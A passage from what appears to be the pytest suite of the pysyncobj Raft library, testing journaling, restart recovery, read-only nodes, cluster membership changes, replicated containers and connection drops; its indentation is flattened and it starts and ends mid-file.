assert journal[-1] == (b'cmd3', 3, 0)
journal.deleteEntriesFrom(2)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 2
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd2', 2, 0)
journal.deleteEntriesTo(1)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 1
assert journal[0] == (b'cmd2', 2, 0)
journal._destroy()
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_applyJournalAfterRestart():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
objs = [o1]
    doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350)
assert o1.getCounter() == 350
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_autoTick1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1)
assert not o1._isReady()
assert not o2._isReady()
time.sleep(4.5)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
time.sleep(1.5)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o2.addValueSync(10) == 360
assert o1.addValueSync(20) == 380
o1._destroy()
o2._destroy()
time.sleep(0.5)
def test_largeCommands():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Generate ~20Mb data.
testRandStr = getRandStr()
bigStr = ''
for i in xrange(0, 200):
bigStr += getRandStr()
o1.addKeyValue('big', bigStr)
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr)
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr and \
o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_readOnlyNodes():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='123')
o2 = TestObj(a[1], [a[2], a[0]], password='123')
o3 = TestObj(a[2], [a[0], a[1]], password='123')
objs = [o1, o2, o3]
b1 = TestObj(None, [a[0], a[1], a[2]], password='123')
b2 = TestObj(None, [a[0], a[1], a[2]], password='123')
roObjs = [b1, b2]
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
doTicks(objs + roObjs, 4.0, stopFunc=lambda: b1.getCounter() == 350 and b2.getCounter() == 350)
assert b1.getCounter() == b2.getCounter() == 350
assert o1._getLeader() == b1._getLeader() == o2._getLeader() == b2._getLeader()
assert b1._getLeader().address in a
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
newObjs[1].addValue(50)
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0].getCounter() == 400 and b1.getCounter() == 400)
o1._printStatus()
o2._printStatus()
o3._printStatus()
b1._printStatus()
assert newObjs[0].getCounter() == 400
assert b1.getCounter() == 400
doTicks(objs + roObjs, 10.0,
stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs + roObjs]) == len(objs + roObjs))
for o in objs + roObjs:
assert o.getCounter() == 400
currRes = {}
def onAdd(res, err):
currRes[0] = err
b1.addValue(50, callback=onAdd)
doTicks(objs + roObjs, 5.0, stopFunc=lambda: o1.getCounter() == 450 and \
b1.getCounter() == 450 and \
b2.getCounter() == 450 and
currRes.get(0) == FAIL_REASON.SUCCESS)
assert o1.getCounter() == 450
assert b1.getCounter() == 450
assert b2.getCounter() == 450
assert currRes.get(0) == FAIL_REASON.SUCCESS
# check that all objects have 2 readonly nodes
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 2, objs))
# disconnect readonly node
b1._destroy()
doTicks(objs, 2.0)
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 1, objs))
o1._destroy()
o2._destroy()
o3._destroy()
b1._destroy()
b2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_syncobjAdminStatus():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='123')
o2 = TestObj(a[1], [a[0]], password='123')
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
status1 = o1.getStatus()
status2 = o2.getStatus()
assert 'version' in status1
assert 'log_len' in status2
trueRes = {
o1: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status1.items())),
o2: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status2.items())),
}
currRes = {
}
args = {
o1: ['-conn', a[0], '-pass', '123', '-status'],
o2: ['-conn', a[1], '-pass', '123', '-status'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes,
stopFunc=lambda: currRes.get(o1) is not None and currRes.get(o2) is not None)
assert len(currRes[o1]) == len(trueRes[o1])
assert len(currRes[o2]) == len(trueRes[o2])
o1._destroy()
o2._destroy()
def test_syncobjAdminAddRemove():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
trueRes = 'SUCCESS REMOVE ' + a[2]
args[o1] = None
args[o2] = ['-conn', a[1], '-remove', a[2]]
doSyncObjAdminTicks([o1, o2, o3], args, 10.0, currRes, stopFunc=lambda: currRes.get(o2) is not None)
assert currRes[o2] == trueRes
o3._destroy()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
o1._destroy()
o2._destroy()
def test_journalWithAddNodes():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1], dynamicMembershipChange=True)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[2], journalFile=journalFiles[2], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o3.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[1], a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[2], journalFile=journalFiles[2], dynamicMembershipChange=True)
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o1.getCounter() == 350 and o3._isReady() and o3.getCounter() == 350)
assert o1._isReady()
assert o3._isReady()
assert o1.getCounter() == 350
assert o3.getCounter() == 350
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 550 and o3.getCounter() == 550)
assert o1.getCounter() == 550
assert o3.getCounter() == 550
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_syncobjAdminSetVersion():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1.getCodeVersion() == 0
assert o2.getCodeVersion() == 0
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer1' and \
o2.getValue('testKey') == 'valueVer1')
assert o1.getValue('testKey') == 'valueVer1'
assert o2.getValue('testKey') == 'valueVer1'
trueRes = 'SUCCESS SET_VERSION 1'
currRes = {}
args = {
o1: ['-conn', a[0], '-set_version', '1'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getCodeVersion() == 1 and o2.getCodeVersion() == 1)
assert o1.getCodeVersion() == 1
assert o2.getCodeVersion() == 1
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer2' and \
o2.getValue('testKey') == 'valueVer2')
assert o1.getValue('testKey') == 'valueVer2'
assert o2.getValue('testKey') == 'valueVer2'
o1._destroy()
o2._destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_syncobjWaitBinded():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], testType=TEST_TYPE.WAIT_BIND)
o2 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
o1.waitBinded()
o2.waitBinded()
o3 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
with pytest.raises(SyncObjException):
o3.waitBinded()
o1.destroy()
o2.destroy()
o3.destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_unpickle():
data = {'foo': 'bar', 'command': b'\xfa', 'entries': [b'\xfb', b'\xfc']}
python2_cpickle = b'\x80\x02}q\x01(U\x03fooq\x02U\x03barq\x03U\x07commandq\x04U\x01\xfaU\x07entriesq\x05]q\x06(U\x01\xfbU\x01\xfceu.'
python2_pickle = b'\x80\x02}q\x00(U\x03fooq\x01U\x03barq\x02U\x07commandq\x03U\x01\xfaq\x04U\x07entriesq\x05]q\x06(U\x01\xfbq\x07U\x01\xfcq\x08eu.'
python3_pickle = b'\x80\x02}q\x00(X\x03\x00\x00\x00fooq\x01X\x03\x00\x00\x00barq\x02X\x07\x00\x00\x00commandq\x03c_codecs\nencode\nq\x04X\x02\x00\x00\x00\xc3\xbaq\x05X\x06\x00\x00\x00latin1q\x06\x86q\x07Rq\x08X\x07\x00\x00\x00entriesq\t]q\n(h\x04X\x02\x00\x00\x00\xc3\xbbq\x0bh\x06\x86q\x0cRq\rh\x04X\x02\x00\x00\x00\xc3\xbcq\x0eh\x06\x86q\x0fRq\x10eu.'
python2_cpickle_data = pickle.loads(python2_cpickle)
assert data == python2_cpickle_data, 'Failed to unpickle data pickled by python2 cPickle'
python2_pickle_data = pickle.loads(python2_pickle)
assert data == python2_pickle_data, 'Failed to unpickle data pickled by python2 pickle'
python3_pickle_data = pickle.loads(python3_pickle)
assert data == python3_pickle_data, 'Failed to unpickle data pickled by python3 pickle'
class TestConsumer1(SyncObjConsumer):
def __init__(self):
super(TestConsumer1, self).__init__()
self.__counter = 0
@replicated
def add(self, value):
self.__counter += value
@replicated
def set(self, value):
self.__counter = value
def get(self):
return self.__counter
class TestConsumer2(SyncObjConsumer):
def __init__(self):
super(TestConsumer2, self).__init__()
self.__values = {}
@replicated
def set(self, key, value):
self.__values[key] = value
def get(self, key):
return self.__values.get(key)
def test_consumers():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
c11 = TestConsumer1()
c12 = TestConsumer1()
c13 = TestConsumer2()
c21 = TestConsumer1()
c22 = TestConsumer1()
c23 = TestConsumer2()
c31 = TestConsumer1()
c32 = TestConsumer1()
c33 = TestConsumer2()
o1 = TestObj(a[0], [a[1], a[2]], consumers=[c11, c12, c13])
o2 = TestObj(a[1], [a[0], a[2]], consumers=[c21, c22, c23])
o3 = TestObj(a[2], [a[0], a[1]], consumers=[c31, c32, c33])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
c11.set(42)
c11.add(10)
c12.add(15)
c13.set('testKey', 'testValue')
doTicks(objs, 10.0, stopFunc=lambda: c21.get() == 52 and c22.get() == 15 and c23.get('testKey') == 'testValue')
assert c21.get() == 52
assert c22.get() == 15
assert c23.get('testKey') == 'testValue'
o1.forceLogCompaction()
o2.forceLogCompaction()
doTicks(objs, 0.5)
objs = [o1, o2, o3]
doTicks(objs, 10.0, stopFunc=lambda: c31.get() == 52 and c32.get() == 15 and c33.get('testKey') == 'testValue')
assert c31.get() == 52
assert c32.get() == 15
assert c33.get('testKey') == 'testValue'
o1.destroy()
o2.destroy()
o3.destroy()
def test_batteriesCommon():
d1 = ReplDict()
l1 = ReplLockManager(autoUnlockTime=30.0)
d2 = ReplDict()
l2 = ReplLockManager(autoUnlockTime=30.0)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1, consumers=[d1, l1])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1, consumers=[d2, l2])
doAutoTicks(10.0, stopFunc=lambda: o1.isReady() and o2.isReady())
assert o1.isReady() and o2.isReady()
d1.set('testKey', 'testValue', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d2.get('testKey') == 'testValue')
assert d2['testKey'] == 'testValue'
d2.pop('testKey', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d1.get('testKey') == None)
assert d1.get('testKey') == None
assert l1.tryAcquire('test.lock1', sync=True) == True
assert l2.tryAcquire('test.lock1', sync=True) == False
assert l2.isAcquired('test.lock1') == False
l1id = l1._ReplLockManager__selfID
l1._ReplLockManager__lockImpl.prolongate(l1id, 0, _doApply=True)
l1.release('test.lock1', sync=True)
assert l2.tryAcquire('test.lock1', sync=True) == True
assert d1.setdefault('keyA', 'valueA', sync=True) == 'valueA'
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueA'
d2.pop('keyA', sync=True)
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueB'
o1.destroy()
o2.destroy()
l1.destroy()
l2.destroy()
def test_ReplCounter():
c = ReplCounter()
c.set(42, _doApply=True)
assert c.get() == 42
c.add(10, _doApply=True)
assert c.get() == 52
c.sub(20, _doApply=True)
assert c.get() == 32
c.inc(_doApply=True)
assert c.get() == 33
def test_ReplList():
l = ReplList()
l.reset([1, 2, 3], _doApply=True)
assert l.rawData() == [1, 2, 3]
l.set(1, 10, _doApply=True)
assert l.rawData() == [1, 10, 3]
l.append(42, _doApply=True)
assert l.rawData() == [1, 10, 3, 42]
l.extend([5, 6], _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.insert(2, 66, _doApply=True)
assert l.rawData() == [1, 10, 66, 3, 42, 5, 6]
l.remove(66, _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.pop(1, _doApply=True)
assert l.rawData() == [1, 3, 42, 5, 6]
l.sort(reverse=True, _doApply=True)
assert l.rawData() == [42, 6, 5, 3, 1]
assert l.index(6) == 1
assert l.count(42) == 1
assert l.get(2) == 5
assert l[4] == 1
assert len(l) == 5
l.__setitem__(0, 43, _doApply=True)
assert l[0] == 43
def test_ReplDict():
d = ReplDict()
d.reset({
1: 1,
2: 22,
}, _doApply=True)
assert d.rawData() == {
1: 1,
2: 22,
}
d.__setitem__(1, 10, _doApply=True)
assert d.rawData() == {
1: 10,
2: 22,
}
d.set(1, 20, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
}
assert d.setdefault(1, 50, _doApply=True) == 20
assert d.setdefault(3, 50, _doApply=True) == 50
d.update({
5: 5,
6: 7,
}, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
3: 50,
5: 5,
6: 7,
}
assert d.pop(3, _doApply=True) == 50
assert d.pop(6, _doApply=True) == 7
assert d.pop(6, _doApply=True) == None
assert d.pop(6, 0, _doApply=True) == 0
assert d.rawData() == {
1: 20,
2: 22,
5: 5,
}
assert d[1] == 20
assert d.get(2) == 22
assert d.get(22) == None
assert d.get(22, 10) == 10
assert len(d) == 3
assert 2 in d
assert 22 not in d
assert sorted(d.keys()) == [1, 2, 5]
assert sorted(d.values()) == [5, 20, 22]
assert d.items() == d.rawData().items()
d.clear(_doApply=True)
assert len(d) == 0
def test_ReplSet():
s = ReplSet()
s.reset({1, 4}, _doApply=True)
assert s.rawData() == {1, 4}
s.add(10, _doApply=True)
assert s.rawData() == {1, 4, 10}
s.remove(1, _doApply=True)
s.discard(10, _doApply=True)
assert s.rawData() == {4}
assert s.pop(_doApply=True) == 4
s.add(48, _doApply=True)
s.update({9, 2, 3}, _doApply=True)
assert s.rawData() == {9, 2, 3, 48}
assert len(s) == 4
assert 9 in s
assert 42 not in s
s.clear(_doApply=True)
assert len(s) == 0
assert 9 not in s
def test_ReplQueue():
q = ReplQueue()
q.put(42, _doApply=True)
q.put(33, _doApply=True)
q.put(14, _doApply=True)
assert q.get(_doApply=True) == 42
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 14
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 42
def test_ReplPriorityQueue():
q = ReplPriorityQueue()
q.put(42, _doApply=True)
q.put(14, _doApply=True)
q.put(33, _doApply=True)
assert q.get(_doApply=True) == 14
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 42
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplPriorityQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 14
# https://github.com/travis-ci/travis-ci/issues/8695
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('TRAVIS') == 'true', reason='temporary disabled for windows')
def test_ipv6():
random.seed(42)
a = [getNextAddr(ipv6=True), getNextAddr(ipv6=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_localhost():
random.seed(42)
a = [getNextAddr(isLocalhost=True), getNextAddr(isLocalhost=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_leaderFallback():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], leaderFallbackTimeout=30.0)
o2 = TestObj(a[1], [a[0]], leaderFallbackTimeout=30.0)
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 5.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1._SyncObj__conf.leaderFallbackTimeout = 3.0
o2._SyncObj__conf.leaderFallbackTimeout = 3.0
doTicks([o for o in objs if o._isLeader()], 2.0)
assert o1._isLeader() or o2._isLeader()
doTicks([o for o in objs if o._isLeader()], 2.0)
assert not o1._isLeader() and not o2._isLeader()
class ZeroDeployConsumerAlpha(SyncObjConsumer):
@replicated(ver=1)
def someMethod(self):
pass
@replicated
def methodTwo(self):
pass
class ZeroDeployConsumerBravo(SyncObjConsumer):
@replicated
def alphaMethod(self):
pass
@replicated(ver=3)
def methodTwo(self):
pass
class ZeroDeployTestObj(SyncObj):
def __init__(self, selfAddr, otherAddrs, consumers):
cfg = SyncObjConf(autoTick=False)
super(ZeroDeployTestObj, self).__init__(selfAddr, otherAddrs, cfg, consumers=consumers)
@replicated
def someMethod(self):
pass
@replicated
def otherMethod(self):
pass
@replicated(ver=1)
def thirdMethod(self):
pass
@replicated(ver=2)
def lastMethod(self):
pass
@replicated(ver=3)
def lastMethod(self):
pass
def test_zeroDeployVersions():
random.seed(42)
a = [getNextAddr()]
cAlpha = ZeroDeployConsumerAlpha()
cBravo = ZeroDeployConsumerBravo()
o1 = ZeroDeployTestObj(a[0], [], [cAlpha, cBravo])
assert hasattr(o1, 'otherMethod_v0') == True
assert hasattr(o1, 'lastMethod_v2') == True
assert hasattr(o1, 'lastMethod_v3') == True
assert hasattr(o1, 'lastMethod_v4') == False
assert hasattr(cAlpha, 'methodTwo_v0') == True
assert hasattr(cBravo, 'methodTwo_v3') == True
assert o1._methodToID['lastMethod_v2'] > o1._methodToID['otherMethod_v0']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['lastMethod_v2']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['thirdMethod_v1'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['lastMethod_v2'] > o1._methodToID[(id(cAlpha), 'methodTwo_v0')]
assert o1._methodToID[id(cBravo), 'methodTwo_v3'] > o1._methodToID['lastMethod_v2']
assert 'someMethod' not in o1._methodToID
assert 'thirdMethod' not in o1._methodToID
assert 'lastMethod' not in o1._methodToID
def test_dnsResolverBug(monkeypatch):
monkeypatch.setattr(dns_resolver, "monotonicTime", lambda: 0.0)
resolver = dns_resolver.DnsCachingResolver(600, 30)
ip = resolver.resolve('localhost')
assert ip == '127.0.0.1'
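# MockSocket wraps a real socket and makes send() return a bogus value once its
# budget of successful sends is exhausted; setMockSocket installs it on the
# connections towards readonly nodes to simulate a dropped connection in
# test_readOnlyDrop.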
class MockSocket(object):
def __init__(self, socket, numSuccessSends):
self.socket = socket
self.numSuccessSends = numSuccessSends
def send(self, data):
self.numSuccessSends -= 1
if self.numSuccessSends <= 0:
return -100500
return self.socket.send(data)
def close(self):
return self.socket.close()
def getsockopt(self, *args, **kwargs):
return self.socket.getsockopt(*args, **kwargs)
def recv(self, *args, **kwargs):
return self.socket.recv(*args, **kwargs)
def setMockSocket(o, numSuccess = 0):
for readonlyNode in o._SyncObj__readonlyNodes:
for node, conn in o._SyncObj__transport._connections.items():
if node == readonlyNode:
origSocket = conn._TcpConnection__socket
conn._TcpConnection__socket = MockSocket(origSocket, numSuccess)
#origSend = origSocket.send
#origSocket.send = lambda x: mockSend(origSend, x)
#print("Set mock send")
def test_readOnlyDrop():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
o3 = TestObj(None, [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350 and o3.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o3.getCounter() == 350
setMockSocket(o1, 1)
setMockSocket(o2, 1)
global _g_numSuccessSends
_g_numSuccessSends = 0
for i in range(150):
o1.addValue(1)
for i in range(200):
o2.addValue(1)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 700 and o2.getCounter() == 700)
